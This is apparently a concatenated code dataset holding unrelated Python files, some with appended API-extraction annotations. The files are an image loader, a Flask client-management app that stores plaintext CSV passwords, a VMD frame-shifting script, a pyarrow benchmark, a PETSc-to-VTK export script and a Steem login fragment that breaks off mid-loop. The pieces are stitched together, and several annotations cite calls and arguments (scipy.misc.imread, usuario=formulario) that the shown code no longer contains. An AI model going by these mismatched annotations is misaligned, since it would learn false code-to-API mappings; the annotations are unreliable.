    normalized from [0, 255] to [-1, 1].

    Bug fix: the original used ``scipy.misc.imread`` / ``scipy.misc.imresize``,
    which were removed from SciPy (>= 1.2/1.3) and crash with AttributeError
    on current installs.  This version uses ``imageio`` and
    ``skimage.transform.resize`` -- both already imported by this module.

    Side effect: changes the process working directory to *path*.

    Returns
    -------
    (imgs_hr, imgs_lr) : tuple of ndarray
        Arrays of shape (n, 64, 64, 3) and (n, 16, 16, 3) in [-1, 1].
    """
    imgs_hr = []
    imgs_lr = []
    os.chdir(path)
    # train_images = glob.glob("./train/*.jpg")
    # val_images = glob.glob("./validation/*.jpg")
    test_images = glob.glob("./test/*.jpg")
    for img_path in test_images:
        img = np.asarray(imageio.imread(img_path)).astype(float)
        # preserve_range keeps pixel values on the [0, 255] scale so the
        # normalization below matches the old scipy.misc.imresize behaviour.
        img_hr = resize(img, (64, 64), preserve_range=True)
        img_lr = resize(img, (16, 16), preserve_range=True)
        imgs_hr.append(img_hr)
        imgs_lr.append(img_lr)
    # Scale pixel values from [0, 255] to [-1, 1].
    imgs_hr = np.array(imgs_hr) / 127.5 - 1.
    imgs_lr = np.array(imgs_lr) / 127.5 - 1.
    return imgs_hr, imgs_lr
if __name__ == "__main__":
    # Script entry point: run only when executed directly.
    main()
| [
"imageio.imwrite",
"os.walk",
"os.path.join",
"numpy.asarray",
"os.chdir",
"numpy.array",
"scipy.misc.imread",
"scipy.misc.imresize",
"glob.glob"
] | [((285, 301), 'os.walk', 'os.walk', (['rootdir'], {}), '(rootdir)\n', (292, 301), False, 'import os\n'), ((1291, 1305), 'os.chdir', 'os.chdir', (['path'], {}), '(path)\n', (1299, 1305), False, 'import os\n'), ((1438, 1463), 'glob.glob', 'glob.glob', (['"""./test/*.jpg"""'], {}), "('./test/*.jpg')\n", (1447, 1463), False, 'import glob\n'), ((1712, 1746), 'scipy.misc.imresize', 'scipy.misc.imresize', (['img', '(64, 64)'], {}), '(img, (64, 64))\n', (1731, 1746), False, 'import scipy\n'), ((1769, 1803), 'scipy.misc.imresize', 'scipy.misc.imresize', (['img', '(16, 16)'], {}), '(img, (16, 16))\n', (1788, 1803), False, 'import scipy\n'), ((349, 378), 'os.path.join', 'os.path.join', (['rootdir', 'subdir'], {}), '(rootdir, subdir)\n', (361, 378), False, 'import os\n'), ((1901, 1918), 'numpy.array', 'np.array', (['imgs_hr'], {}), '(imgs_hr)\n', (1909, 1918), True, 'import numpy as np\n'), ((1951, 1968), 'numpy.array', 'np.array', (['imgs_lr'], {}), '(imgs_lr)\n', (1959, 1968), True, 'import numpy as np\n'), ((842, 857), 'numpy.asarray', 'np.asarray', (['img'], {}), '(img)\n', (852, 857), True, 'import numpy as np\n'), ((1042, 1071), 'imageio.imwrite', 'imageio.imwrite', (['path_hr', 'img'], {}), '(path_hr, img)\n', (1057, 1071), False, 'import imageio\n'), ((1631, 1670), 'scipy.misc.imread', 'scipy.misc.imread', (['img_path'], {'mode': '"""RGB"""'}), "(img_path, mode='RGB')\n", (1648, 1670), False, 'import scipy\n')] |
#Necesario para hacer el renderizado HTML de las templates
from flask import render_template, redirect, url_for, flash, session
from app import app
from .forms import *
import csv
from .utils import *
@app.route('/')
def index():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/ingresar', methods=['GET', 'POST'])
def ingresar():
    """Log a user in with username and password.

    On GET, render the login form.  On a valid POST, look the credentials
    up in ``usuarios.csv``: a match stores the username in the session and
    renders the welcome page; a mismatch flashes an error and redirects
    back to the form.

    Bug fix: the original flashed the "wrong credentials" message and
    redirected to itself on every non-submitted request (an infinite
    redirect loop on GET -- the login form was unreachable) while a failed
    POST silently re-rendered with no message; it also used bare
    ``next()`` on the CSV reader, which raises StopIteration on an empty
    file.

    return -> the rendered template
    """
    if not 'username' in session:
        formulario = loginForm()
        if formulario.validate_on_submit():
            with open('usuarios.csv') as archivo:
                archivo_csv = csv.reader(archivo)
                # Each row is (username, password).
                for registro in archivo_csv:
                    if formulario.username.data == registro[0] and formulario.password.data == registro[1]:
                        print('postback success')
                        flash('Bienvenido/a')
                        session['username'] = formulario.username.data
                        return render_template('ingresoOK.html', nombre=session['username'])
            # POST with no matching credentials.
            print('postback error')
            flash('Ingresaste mal el usuario o contraseña. Reintenta')
            return redirect(url_for('ingresar'))
        return render_template('login.html', formulario=formulario)
    else:
        return index()
@app.route('/registro', methods=['GET', 'POST'])
def registro():
    """
    Register a new username and password.
    return -> the rendered registration template
    """
    formulario = registrationForm()
    if formulario.validate_on_submit():
        if formulario.password.data == formulario.password2.data:
            # Only register the username if it is not already taken.
            if validarUsuarioNuevo(formulario.username.data):
                with open('usuarios.csv', 'a+', newline='') as archivo:
                    archivo_csv = csv.writer(archivo)
                    registro = [formulario.username.data, formulario.password.data]
                    archivo_csv.writerow(registro)
                # NOTE(review): the password is stored in plain text; hashing
                # it (e.g. werkzeug.security) would be safer.
                flash('Usuario creado correctamente')
                return redirect(url_for('ingresar'))
            else:
                flash("Usuario previamente registrado")
        else:
            flash('Las passwords no coinciden')
    return render_template('registro.html', form=formulario)
@app.route('/clientes', methods=['GET', 'POST'])
def clientes():
    """
    Show the registered clients (login required).
    return -> the rendered template with the client list headers
    and the rows
    """
    iClientes = []
    iEncabezados = []
    if 'username' in session:
        # Reuse the cached client list from the session when available.
        # NOTE(review): nothing in this module ever sets session['iClientes'],
        # so the CSV branch always runs -- confirm this is intended.
        if not 'iClientes' in session:
            iClientes = abrirCSV('clientes.csv')
        else:
            iClientes = session['iClientes']
        # NOTE(review): raises IndexError if the client CSV is empty.
        iEncabezados = iClientes[0].keys()
        return render_template('clientes.html', inserciones = iClientes, encabezados=iEncabezados)
    else:
        return ingresar()
@app.route('/clientesPaises', methods=['GET', 'POST'])
def clientesPais():
    """
    Show the clients filtered by country (login required).
    return -> the rendered template with the client list headers
    and the matching rows
    """
    Clientes = []
    Encabezados = []
    ClientesMostrados = []
    formulario = clientesPaisForm()
    if 'username' in session:
        if formulario.is_submitted():
            Clientes = abrirCSV('clientes.csv')
            session['Clientes'] = Clientes
            # Case-insensitive match on the country column.
            for item in Clientes:
                if str(item['País']).upper() == formulario.txtPais.data.upper():
                    ClientesMostrados.append(item)
            # NOTE(review): raises IndexError if the client CSV is empty.
            Encabezados = Clientes[0].keys()
            if ClientesMostrados == []:
                flash("No hay clientes en ese país")
        return render_template('clientesPais.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
    else:
        return ingresar()
@app.route('/clientesEdad', methods=['GET', 'POST'])
def clientesEdad():
    """
    Show the clients filtered by an age range (login required).

    Bug fix: the positive-number validation used to receive the *minimum*
    age twice, so a negative maximum age was never rejected; both bounds
    are now validated.

    return -> the rendered template with the client list headers
    and the matching rows
    """
    Clientes = []
    Encabezados = []
    ClientesMostrados = []
    formulario = clientesEdadForm()
    if 'username' in session:
        if formulario.is_submitted():
            Clientes = abrirCSV('clientes.csv')
            session['Clientes'] = Clientes
            # Reject negative bounds before filtering.
            if ValidarSoloNumerosPositivos(formulario.txtEdadMinina.data, formulario.txtEdadMaxima.data) == False:
                flash("Error. Solo puede ingresar números positivos")
                return render_template('clientesEdad.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
            # Keep clients whose age falls inside [min, max].
            for item in Clientes:
                if int(item['Edad']) >= formulario.txtEdadMinina.data and int(item['Edad']) <= formulario.txtEdadMaxima.data:
                    ClientesMostrados.append(item)
            Encabezados = Clientes[0].keys()
            if ClientesMostrados == []:
                flash("No hay clientes en ese rango etáreo")
        return render_template('clientesEdad.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
    else:
        return ingresar()
@app.route('/clientesFecha', methods=['GET', 'POST'])
def clientesFecha():
    """
    Show the clients filtered by their registration ("alta") date
    (login required).
    return -> the rendered template with the client list headers
    and the matching rows
    """
    Clientes = []
    Encabezados = []
    ClientesMostrados = []
    formulario = clientesFechaForm()
    if 'username' in session:
        if formulario.is_submitted():
            Clientes = abrirCSV('clientes.csv')
            session['Clientes'] = Clientes
            # Exact string match against the form's date value.
            for item in Clientes:
                if item['Fecha Alta'] == str(formulario.dateFecha.data):
                    ClientesMostrados.append(item)
            # NOTE(review): raises IndexError if the client CSV is empty.
            Encabezados = Clientes[0].keys()
            if ClientesMostrados == []:
                flash("No hay clientes dados de alta en esa fecha")
        return render_template('clientesFecha.html', inserciones=ClientesMostrados, encabezados=Encabezados, formulario=formulario)
    else:
        return ingresar()
@app.route('/agregarCliente', methods=['GET', 'POST'])
def agregarCliente():
    """
    Add a new client (login required).

    Bug fix: the original checked the document number against each row
    *inside* the loop, so the client was registered as soon as the first
    row had a different document -- a duplicate was only detected when it
    happened to be the very first record, and nothing could ever be added
    when the list was empty.  The duplicate check now inspects every row
    before writing.

    return -> the rendered template with the add-client form
    """
    formulario = agregarClientesForm()
    if 'username' in session:
        if formulario.is_submitted():
            Clientes = abrirCSV('clientes.csv')
            # True when some existing row already uses this document number.
            existe = any(item['Documento'] == formulario.txtDocumento.data for item in Clientes)
            if not existe:
                with open('clientes.csv', 'a+', newline="") as archivo:
                    archivo_csv = csv.writer(archivo)
                    registro = [formulario.txtNombre.data, formulario.txtEdad.data, formulario.txtDireccion.data, formulario.txtPais.data, formulario.txtDocumento.data, formulario.txtFechaAlta.data, formulario.txtCorreo.data, formulario.txtTrabajo.data ]
                    archivo_csv.writerow(registro)
                flash("El cliente se registró correctamente")
                return redirect(url_for('agregarCliente'))
            else:
                flash("El cliente ya esta en la base de datos")
        return render_template('agregarCliente.html', form=formulario)
    else:
        return ingresar()
@app.route('/agregarProducto', methods=['GET', 'POST'])
def agregarProducto():
    """
    Add a new product for sale (login required).

    Bug fix: the original compared the code against each row *inside* the
    loop and registered the product as soon as the first row had a
    different code, so duplicates were only caught when they happened to
    be the first record.  The duplicate check now inspects every row
    before writing.

    return -> the rendered template with the add-product form
    """
    formulario = agregarProductoForm()
    if 'username' in session:
        if formulario.validate_on_submit():
            Productos = abrirCSV('productos.csv')
            # True when some existing row already uses this product code.
            existe = any(item['codigo'] == formulario.txtCodigo.data for item in Productos)
            if not existe:
                with open('productos.csv', 'a+', newline="") as archivo:
                    archivo_csv = csv.writer(archivo)
                    registro = [formulario.txtCodigo.data, formulario.txtDescripcion.data, formulario.txtPrecio.data, formulario.txtCantidad.data]
                    archivo_csv.writerow(registro)
                flash("El producto se registró correctamente")
                return redirect(url_for('agregarProducto'))
            else:
                flash("El producto ya esta previamente registrado")
        return render_template('agregarProducto.html', form=formulario)
    else:
        return ingresar()
@app.route('/bienvenido', methods=['GET', 'POST'])
def bienvenido():
    """
    Confirm that the user logged into the application successfully.

    Bug fix: the original referenced an undefined ``formulario`` variable
    (NameError on every request) and passed it as ``usuario=``; the
    logged-in name is taken from the session and passed as ``nombre=``,
    matching how ingresoOK.html is rendered by ingresar().

    return -> the rendered template with the success message
    """
    if 'username' in session:
        return render_template('ingresoOK.html', nombre=session['username'])
    else:
        return ingresar()
@app.route('/sobre')
def sobre():
    """
    Show information about the developer and related details.
    return -> the rendered template with the information
    """
    return render_template('sobre.html')
@app.errorhandler(404)
def no_encontrado(e):
    """
    Render the 404 (not found) error page.
    return -> the rendered template plus the 404 status code
    """
    return render_template('404.html'), 404
@app.errorhandler(500)
def error_interno(e):
    """
    Render the 500 (internal server error) page.
    return -> the rendered template plus the 500 status code
    """
    return render_template('500.html'), 500
@app.route('/logout', methods=['GET'])
def logout():
    """
    Close the current user's session.
    return -> the rendered logout page, or a redirect to the index when
    nobody is logged in
    """
    if 'username' not in session:
        return redirect(url_for('index'))
    session.pop('username')
    return render_template('logout.html')
"flask.render_template",
"flask.flash",
"csv.writer",
"flask.url_for",
"app.app.errorhandler",
"app.app.route",
"flask.session.pop",
"csv.reader"
] | [((210, 224), 'app.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (219, 224), False, 'from app import app\n'), ((285, 332), 'app.app.route', 'app.route', (['"""/ingresar"""'], {'methods': "['GET', 'POST']"}), "('/ingresar', methods=['GET', 'POST'])\n", (294, 332), False, 'from app import app\n'), ((1524, 1571), 'app.app.route', 'app.route', (['"""/registro"""'], {'methods': "['GET', 'POST']"}), "('/registro', methods=['GET', 'POST'])\n", (1533, 1571), False, 'from app import app\n'), ((2529, 2576), 'app.app.route', 'app.route', (['"""/clientes"""'], {'methods': "['GET', 'POST']"}), "('/clientes', methods=['GET', 'POST'])\n", (2538, 2576), False, 'from app import app\n'), ((3191, 3244), 'app.app.route', 'app.route', (['"""/clientesPaises"""'], {'methods': "['GET', 'POST']"}), "('/clientesPaises', methods=['GET', 'POST'])\n", (3200, 3244), False, 'from app import app\n'), ((4211, 4262), 'app.app.route', 'app.route', (['"""/clientesEdad"""'], {'methods': "['GET', 'POST']"}), "('/clientesEdad', methods=['GET', 'POST'])\n", (4220, 4262), False, 'from app import app\n'), ((5617, 5669), 'app.app.route', 'app.route', (['"""/clientesFecha"""'], {'methods': "['GET', 'POST']"}), "('/clientesFecha', methods=['GET', 'POST'])\n", (5626, 5669), False, 'from app import app\n'), ((6654, 6707), 'app.app.route', 'app.route', (['"""/agregarCliente"""'], {'methods': "['GET', 'POST']"}), "('/agregarCliente', methods=['GET', 'POST'])\n", (6663, 6707), False, 'from app import app\n'), ((8035, 8089), 'app.app.route', 'app.route', (['"""/agregarProducto"""'], {'methods': "['GET', 'POST']"}), "('/agregarProducto', methods=['GET', 'POST'])\n", (8044, 8089), False, 'from app import app\n'), ((9310, 9359), 'app.app.route', 'app.route', (['"""/bienvenido"""'], {'methods': "['GET', 'POST']"}), "('/bienvenido', methods=['GET', 'POST'])\n", (9319, 9359), False, 'from app import app\n'), ((9709, 9728), 'app.app.route', 'app.route', (['"""/sobre"""'], {}), "('/sobre')\n", (9718, 9728), 
False, 'from app import app\n'), ((9944, 9965), 'app.app.errorhandler', 'app.errorhandler', (['(404)'], {}), '(404)\n', (9960, 9965), False, 'from app import app\n'), ((10167, 10188), 'app.app.errorhandler', 'app.errorhandler', (['(500)'], {}), '(500)\n', (10183, 10188), False, 'from app import app\n'), ((10390, 10427), 'app.app.route', 'app.route', (['"""/logout"""'], {'methods': "['GET']"}), "('/logout', methods=['GET'])\n", (10399, 10427), False, 'from app import app\n'), ((251, 280), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (266, 280), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2475, 2524), 'flask.render_template', 'render_template', (['"""registro.html"""'], {'form': 'formulario'}), "('registro.html', form=formulario)\n", (2490, 2524), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9910, 9939), 'flask.render_template', 'render_template', (['"""sobre.html"""'], {}), "('sobre.html')\n", (9925, 9939), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1432, 1484), 'flask.render_template', 'render_template', (['"""login.html"""'], {'formulario': 'formulario'}), "('login.html', formulario=formulario)\n", (1447, 1484), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((3065, 3151), 'flask.render_template', 'render_template', (['"""clientes.html"""'], {'inserciones': 'iClientes', 'encabezados': 'iEncabezados'}), "('clientes.html', inserciones=iClientes, encabezados=\n iEncabezados)\n", (3080, 3151), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4053, 4172), 'flask.render_template', 'render_template', (['"""clientesPais.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesPais.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (4068, 
4172), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((5459, 5578), 'flask.render_template', 'render_template', (['"""clientesEdad.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesEdad.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (5474, 5578), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((6495, 6615), 'flask.render_template', 'render_template', (['"""clientesFecha.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesFecha.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (6510, 6615), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7937, 7992), 'flask.render_template', 'render_template', (['"""agregarCliente.html"""'], {'form': 'formulario'}), "('agregarCliente.html', form=formulario)\n", (7952, 7992), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9211, 9267), 'flask.render_template', 'render_template', (['"""agregarProducto.html"""'], {'form': 'formulario'}), "('agregarProducto.html', form=formulario)\n", (9226, 9267), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9599, 9666), 'flask.render_template', 'render_template', (['"""ingresoOK.html"""'], {'usuario': 'formulario.username.data'}), "('ingresoOK.html', usuario=formulario.username.data)\n", (9614, 9666), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10130, 10157), 'flask.render_template', 'render_template', (['"""404.html"""'], {}), "('404.html')\n", (10145, 10157), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10353, 10380), 'flask.render_template', 'render_template', (['"""500.html"""'], {}), "('500.html')\n", (10368, 10380), 
False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10620, 10643), 'flask.session.pop', 'session.pop', (['"""username"""'], {}), "('username')\n", (10631, 10643), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10660, 10690), 'flask.render_template', 'render_template', (['"""logout.html"""'], {}), "('logout.html')\n", (10675, 10690), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2427, 2462), 'flask.flash', 'flash', (['"""Las passwords no coinciden"""'], {}), "('Las passwords no coinciden')\n", (2432, 2462), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((10727, 10743), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (10734, 10743), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((682, 701), 'csv.reader', 'csv.reader', (['archivo'], {}), '(archivo)\n', (692, 701), False, 'import csv\n'), ((2231, 2268), 'flask.flash', 'flash', (['"""Usuario creado correctamente"""'], {}), "('Usuario creado correctamente')\n", (2236, 2268), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2359, 2398), 'flask.flash', 'flash', (['"""Usuario previamente registrado"""'], {}), "('Usuario previamente registrado')\n", (2364, 2398), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4000, 4036), 'flask.flash', 'flash', (['"""No hay clientes en ese país"""'], {}), "('No hay clientes en ese país')\n", (4005, 4036), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4886, 4939), 'flask.flash', 'flash', (['"""Error. Solo puede ingresar números positivos"""'], {}), "('Error. 
Solo puede ingresar números positivos')\n", (4891, 4939), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((4964, 5083), 'flask.render_template', 'render_template', (['"""clientesEdad.html"""'], {'inserciones': 'ClientesMostrados', 'encabezados': 'Encabezados', 'formulario': 'formulario'}), "('clientesEdad.html', inserciones=ClientesMostrados,\n encabezados=Encabezados, formulario=formulario)\n", (4979, 5083), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((5398, 5442), 'flask.flash', 'flash', (['"""No hay clientes en ese rango etáreo"""'], {}), "('No hay clientes en ese rango etáreo')\n", (5403, 5442), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((6427, 6478), 'flask.flash', 'flash', (['"""No hay clientes dados de alta en esa fecha"""'], {}), "('No hay clientes dados de alta en esa fecha')\n", (6432, 6478), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1299, 1357), 'flask.flash', 'flash', (['"""Ingresaste mal el usuario o contraseña. Reintenta"""'], {}), "('Ingresaste mal el usuario o contraseña. 
Reintenta')\n", (1304, 1357), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((2057, 2076), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (2067, 2076), False, 'import csv\n'), ((2302, 2321), 'flask.url_for', 'url_for', (['"""ingresar"""'], {}), "('ingresar')\n", (2309, 2321), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7635, 7680), 'flask.flash', 'flash', (['"""El cliente se registró correctamente"""'], {}), "('El cliente se registró correctamente')\n", (7640, 7680), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7789, 7836), 'flask.flash', 'flash', (['"""El cliente ya esta en la base de datos"""'], {}), "('El cliente ya esta en la base de datos')\n", (7794, 7836), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7865, 7920), 'flask.render_template', 'render_template', (['"""agregarCliente.html"""'], {'form': 'formulario'}), "('agregarCliente.html', form=formulario)\n", (7880, 7920), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((8902, 8948), 'flask.flash', 'flash', (['"""El producto se registró correctamente"""'], {}), "('El producto se registró correctamente')\n", (8907, 8948), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9058, 9109), 'flask.flash', 'flash', (['"""El producto ya esta previamente registrado"""'], {}), "('El producto ya esta previamente registrado')\n", (9063, 9109), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((9138, 9194), 'flask.render_template', 'render_template', (['"""agregarProducto.html"""'], {'form': 'formulario'}), "('agregarProducto.html', form=formulario)\n", (9153, 9194), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((966, 987), 'flask.flash', 'flash', (['"""Bienvenido/a"""'], {}), "('Bienvenido/a')\n", (971, 987), False, 'from 
flask import render_template, redirect, url_for, flash, session\n'), ((1092, 1153), 'flask.render_template', 'render_template', (['"""ingresoOK.html"""'], {'nombre': "session['username']"}), "('ingresoOK.html', nombre=session['username'])\n", (1107, 1153), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((1395, 1414), 'flask.url_for', 'url_for', (['"""ingresar"""'], {}), "('ingresar')\n", (1402, 1414), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((7278, 7297), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (7288, 7297), False, 'import csv\n'), ((7718, 7743), 'flask.url_for', 'url_for', (['"""agregarCliente"""'], {}), "('agregarCliente')\n", (7725, 7743), False, 'from flask import render_template, redirect, url_for, flash, session\n'), ((8653, 8672), 'csv.writer', 'csv.writer', (['archivo'], {}), '(archivo)\n', (8663, 8672), False, 'import csv\n'), ((8986, 9012), 'flask.url_for', 'url_for', (['"""agregarProducto"""'], {}), "('agregarProducto')\n", (8993, 9012), False, 'from flask import render_template, redirect, url_for, flash, session\n')] |
import sys
sys.path.append('../../../vmdgadgets')
import vmdutil
OFFSET = 5
# Previously: RANGE = [(1, 3127), (3467, 6978)]
RANGE = [(1, 3100), (3467, 6978)]


def in_range(frame, offset=0):
    """Return True when *frame* lies inside any (start, end) interval in
    RANGE, with *offset* extending each interval's upper bound."""
    return any(start <= frame <= end + offset for start, end in RANGE)
if '__main__' == __name__ :
    # Load the VMD file named on the command line and write three copies
    # whose bone frames inside RANGE are shifted forward by OFFSET,
    # 2*OFFSET and 3*OFFSET frames respectively.
    vmdin = vmdutil.Vmdio()
    vmdin.load(sys.argv[1])
    bones = vmdin.get_frames('bones')
    for i in range(3):
        offset = (i + 1) * OFFSET
        output = list()
        for bone_frame in bones:
            if in_range(bone_frame.frame, offset):
                # Shift frames that fall inside the (offset-extended) ranges.
                output.append(bone_frame._replace(frame=bone_frame.frame + offset))
            else:
                output.append(bone_frame)
        vmdin.set_frames('bones', output)
        vmdin.store('plus_{}.vmd'.format(offset))
| [
"vmdutil.Vmdio",
"sys.path.append"
] | [((11, 49), 'sys.path.append', 'sys.path.append', (['"""../../../vmdgadgets"""'], {}), "('../../../vmdgadgets')\n", (26, 49), False, 'import sys\n'), ((339, 354), 'vmdutil.Vmdio', 'vmdutil.Vmdio', ([], {}), '()\n', (352, 354), False, 'import vmdutil\n')] |
import conbench.runner
import pyarrow
import pyarrow.parquet as parquet
from benchmarks import _benchmark
@conbench.runner.register_benchmark
class DataframeToTableBenchmark(_benchmark.Benchmark, _benchmark.BenchmarkR):
    """
    Convert a pandas dataframe to an arrow table.
    DataframeToTableBenchmark().run(<source>, options...)
    Parameters
    ----------
    source : str
        A source name from the benchmarks source store.
    language : str, optional
        Valid values: "Python", "R".
    cpu_count : int, optional
        Set the number of threads to use in parallel operations (arrow).
    iterations : int, default 1
        Number of times to run the benchmark.
    gc_collect : boolean, default True
        Whether to do garbage collection before each benchmark run.
    gc_disable : boolean, default True
        Whether to do disable collection during each benchmark run.
    run_id : str, optional
        Group executions together with a run id.
    Returns
    -------
    (result, output) : sequence
        result : The benchmark result.
        output : The output from the benchmarked function.
    """
    # Benchmark names registered on the Python and R sides, respectively.
    name, r_name = "dataframe-to-table", "df_to_table"
    # Benchmark cases skipped by the runner.
    exclude = [
        # https://issues.apache.org/jira/browse/ARROW-11832
        "dataframe-to-table ALL --iterations=3 --language=R"
    ]
    # Positional CLI arguments accepted by this benchmark.
    arguments = ["source"]
    # Data sources used for full runs.
    sources = [
        "chi_traffic_2020_Q1",
        "type_strings",
        "type_dict",
        "type_integers",
        "type_floats",
        "type_nested",
        "type_simple_features",
    ]
    # Smaller sources used for test runs.
    sources_test = [
        "chi_traffic_sample",
        "type_strings",
        "type_dict",
        "type_integers",
        "type_floats",
        "type_nested",
        "type_simple_features",
    ]
    # CLI option definitions.
    options = {
        "language": {"type": str, "choices": ["Python", "R"]},
        "cpu_count": {"type": int},
    }
    def run(self, source, cpu_count=None, **kwargs):
        """Yield one benchmark result per resolved source, dispatching to
        the Python or R implementation based on the ``language`` option."""
        language = kwargs.get("language", "Python").lower()
        for source in self.get_sources(source):
            tags = self.get_tags(source, cpu_count)
            if language == "python":
                dataframe = self._get_dataframe(source.source_path)
                f = self._get_benchmark_function(dataframe)
                yield self.benchmark(f, tags, kwargs)
            elif language == "r":
                command = self._get_r_command(source, kwargs)
                yield self.r_benchmark(command, tags, kwargs)
    def _get_benchmark_function(self, dataframe):
        """Return the zero-argument callable that gets timed."""
        return lambda: pyarrow.Table.from_pandas(dataframe)
    def _get_dataframe(self, path):
        """Load the parquet file at *path* into a pandas dataframe.

        memory_map=False forces a real read up front -- presumably so the
        timed conversion is not skewed by lazy page faults; confirm.
        """
        return parquet.read_table(path, memory_map=False).to_pandas()
    def _get_r_command(self, source, options):
        """Build the R one-liner that runs the arrowbench equivalent."""
        return (
            f"library(arrowbench); "
            f"run_one({self.r_name}, "
            f'source="{source.name}", '
            f'n_iter={options.get("iterations", 1)}, '
            f"cpu_count={self.r_cpu_count(options)})"
        )
| [
"pyarrow.parquet.read_table",
"pyarrow.Table.from_pandas"
] | [((2567, 2603), 'pyarrow.Table.from_pandas', 'pyarrow.Table.from_pandas', (['dataframe'], {}), '(dataframe)\n', (2592, 2603), False, 'import pyarrow\n'), ((2656, 2698), 'pyarrow.parquet.read_table', 'parquet.read_table', (['path'], {'memory_map': '(False)'}), '(path, memory_map=False)\n', (2674, 2698), True, 'import pyarrow.parquet as parquet\n')] |
# coding=utf-8
import sys
import petsc4py
petsc4py.init(sys.argv)
from pyvtk import *
import numpy as np
from scipy.io import loadmat
from src import stokes_flow as sf
from src.stokes_flow import problem_dic, obj_dic
from src.geo import *
def main_fun():
    """Load a tetrahedral boundary mesh from a .mat file and write it as VTK."""
    mat_file = 'around'
    if not mat_file.endswith('.mat'):
        mat_file = mat_file + '.mat'
    nodes_handle = 'bnodes'
    elems_handle = 'belems'
    out_handle = 'tryVTK'
    geometry = base_geo()
    geometry.mat_nodes(filename=mat_file, mat_handle=nodes_handle)
    geometry.mat_elmes(filename=mat_file, mat_handle=elems_handle, elemtype='tetra')
    node_coords = geometry.get_nodes()
    elements, mesh_kind = geometry.get_mesh()
    assert mesh_kind == 'tetra', 'mesh type is NOT tetrahedron. '
    # Use the node coordinates themselves as the exported vector field.
    velocity = node_coords
    vtk_data = VtkData(
        UnstructuredGrid(node_coords, tetra=elements),
        PointData(Vectors(velocity, name='velocity')),
        ' '
    )
    vtk_data.tofile(out_handle)


if __name__ == '__main__':
    main_fun()
| [
"petsc4py.init"
] | [((44, 67), 'petsc4py.init', 'petsc4py.init', (['sys.argv'], {}), '(sys.argv)\n', (57, 67), False, 'import petsc4py\n')] |
from flask import Flask, render_template, request, jsonify, redirect, url_for, session, flash, Response
from flaskext.markdown import Markdown
from pymongo import MongoClient
from steem import Steem
from datetime import date, timedelta, datetime
from dateutil import parser
from slugify import slugify
import sys, traceback, json, textwrap, requests, pprint, time, math, arrow
# Application setup: static assets are served from the site root.
app = Flask(__name__, static_folder='static', static_url_path='')
# Deployment-specific settings come from the file named by FOMODEALS_SETTINGS.
app.config.from_envvar('FOMODEALS_SETTINGS')
app.secret_key=app.config['SESSION_SECRET']
# Comma-separated admin usernames from config.
admins = app.config['ADMINS'].split(',')
# Enable the {{ ...|markdown }} Jinja filter.
Markdown(app)
# "fomodeals" database on the "mongodb" host (docker-compose service name, presumably).
db = MongoClient("mongodb://mongodb:27017").fomodeals
def confirm_user():
    """Re-validate the SteemConnect token stored in the session.

    Side effects: sets session['authorized'] to whether the account is
    "fomodeals" or has granted "fomodeals" posting authority; clears
    session['logged_in'] when the token is rejected by SteemConnect.

    Returns True when the token is valid and matches session['username'].
    """
    if not 'token' in session or not 'username' in session:
        return False
    r = requests.get('https://v2.steemconnect.com/api/me', headers={ 'Authorization': session['token'] })
    if r.status_code == 200:
        # Default to unauthorized; only flip to True on an explicit match below.
        session['authorized'] = False
        if r.json()['_id'] != session['username']:
            # Token belongs to a different account than the session claims.
            return False
        if session['username'] == "fomodeals":
            session['authorized'] = True
        elif 'account_auths' in r.json()['account']['posting']:
            # Authorized if the account delegated posting authority to @fomodeals.
            for auth_account in r.json()['account']['posting']['account_auths']:
